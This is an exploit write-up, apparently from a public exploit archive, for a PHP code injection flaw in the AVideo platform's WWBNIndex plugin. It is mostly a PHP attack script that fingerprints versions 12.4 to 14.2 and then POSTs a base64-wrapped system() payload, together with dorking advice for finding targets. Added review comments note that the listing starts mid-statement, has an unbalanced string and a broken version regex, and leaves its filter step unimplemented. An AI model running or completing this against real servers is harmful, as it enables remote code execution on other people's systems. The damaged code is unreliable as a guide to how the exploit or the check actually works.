=============================================================================================================================================
| # Title : AVideo 12.4 php code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://github.com/WWBN/AVideo/tree/master |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] The following php code Upload shell file from external link.
[+] Line 114 set your target.
[+] Line 115 set your commands.
[+] save code as poc.php .
[+] USage : cmd = php poc.php .
[+] PayLoad :

// NOTE(review): the listing starts mid-statement here. The PHP open tag, the class
// declaration, its property declarations and the constructor signature are not present
// in this copy (apparently lost when the page was extracted). The fragment below is
// reproduced as found and is not a complete, parseable file.
target_uri = $target_uri;
        $this->payload = $payload;
    }

    /**
     * Wraps the configured payload, passes it through generatePhpFilterPayload()
     * and POSTs the result to the WWBNIndex plugin endpoint.
     *
     * Defender note: the only request this method emits is a POST to
     * /plugin/WWBNIndex/submitIndex.php carrying a `systemRootPath` form field.
     * That path/parameter pair is the request shape to look for in web-server
     * and WAF logs.
     */
    public function exploit() {
        // Prepare the payload
        // NOTE(review): the string expression on the next line is unbalanced as listed
        // (part of it appears to have been lost in extraction); it is kept byte-for-byte.
        $php_code = "isArchPHP() ? $this->payload : "system(base64_decode('" . base64_encode($this->payload) . "'));") . " ?>";
        $filter_payload = $this->generatePhpFilterPayload($php_code);

        // Send the request
        $data = http_build_query(['systemRootPath' => $filter_payload]);
        $response = $this->sendRequest('POST', '/plugin/WWBNIndex/submitIndex.php', $data);

        // Only a non-200 status is reported; a 200 response produces no output at all.
        if ($response['code'] !== 200) {
            echo "Server returned " . $response['code'] . ". Successful exploit attempts should not return a response.\n";
        }
    }

    /**
     * Fingerprints the target and returns a human-readable verdict string.
     *
     * Steps, in order: GET /index.php, try to read the AVideo version from the
     * body, GET /plugin/WWBNIndex/submitIndex.php, then compare the version.
     * The condition reported as vulnerable is: version between 12.4 and 14.2
     * inclusive AND the plugin path answering 200. Versions outside that range
     * are reported as non-vulnerable. For defenders this is the exposure
     * condition to inventory for.
     *
     * @return string status or verdict message
     */
    public function check() {
        $response = $this->sendRequest('GET', '/index.php');
        // NOTE(review): sendRequest() always returns a two-key array, which is truthy in
        // PHP, so this branch is not taken as written; connection failures surface
        // through the status-code test below instead.
        if (!$response) {
            return 'Failed to connect to the target.';
        }
        if ($response['code'] !== 200) {
            return "Unexpected HTTP response code: " . $response['code'];
        }

        // First attempt: version from the "Powered by" footer text.
        preg_match('/Powered by AVideo ® Platform v([\d.]+)/', $response['body'], $version_match);
        // NOTE(review): this second call reuses $version_match, so it replaces the
        // captures of the first call. The pattern '//m' has no capture group (it looks
        // extraction-damaged), so index 1 is never set and the empty() test below is
        // always true as listed. A result of "Unable to extract AVideo version." from
        // this listing is therefore not evidence that a host is unaffected.
        preg_match('//m', $response['body'], $version_match);
        if (empty($version_match[1])) {
            return 'Unable to extract AVideo version.';
        }
        $version = $version_match[1];

        // The plugin is considered present only when its endpoint answers 200 to a GET.
        $plugin_check = $this->sendRequest('GET', '/plugin/WWBNIndex/submitIndex.php');
        if ($plugin_check['code'] !== 200) {
            return 'Vulnerable plugin WWBNIndex was not detected';
        }

        // Inclusive range test: 12.4 <= version <= 14.2.
        if (version_compare($version, '12.4') >= 0 && version_compare($version, '14.2') <= 0) {
            return "Detected vulnerable AVideo version: {$version}, with vulnerable plugin WWBNIndex running.";
        }
        return "Detected non-vulnerable AVideo version: {$version}";
    }

    /**
     * Performs one HTTP request with cURL against target_uri . $uri.
     *
     * No timeout, redirect or TLS options are set here, so cURL's defaults apply.
     *
     * @param string      $method HTTP verb, passed to CURLOPT_CUSTOMREQUEST
     * @param string      $uri    path appended to the configured target_uri
     * @param string|null $data   request body; only used when $method is 'POST'
     * @return array 'code' => status from CURLINFO_HTTP_CODE, 'body' => curl_exec() result
     */
    private function sendRequest($method, $uri, $data = null) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $this->target_uri . $uri);
        // Return the response body from curl_exec() instead of printing it.
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
        if ($method === 'POST') {
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        }
        $response = curl_exec($ch);
        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        return ['code' => $http_code, 'body' => $response];
    }

    /**
     * Stub: always returns true in this listing.
     */
    private function isArchPHP() {
        // Assume the payload is PHP code
        return true; // or check this based on certain conditions
    }

    /**
     * Stub: returns its argument unchanged; no filter encoding is implemented
     * in this listing.
     */
    private function generatePhpFilterPayload($php_code) {
        // The payload preparation (filter) logic is meant to be added here
        return $php_code; // Adjust this according to your requirements
    }
}

// Usage example:
$target_uri = "http://target-url.com"; // Enter the target address here
$payload = ""; // The payload to be used
$indoushka = new indoushka($target_uri, $payload);
$check_result = $indoushka->check();
echo $check_result . "\n";
// exploit() is called unconditionally, whatever check() returned.
$indoushka->exploit();
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================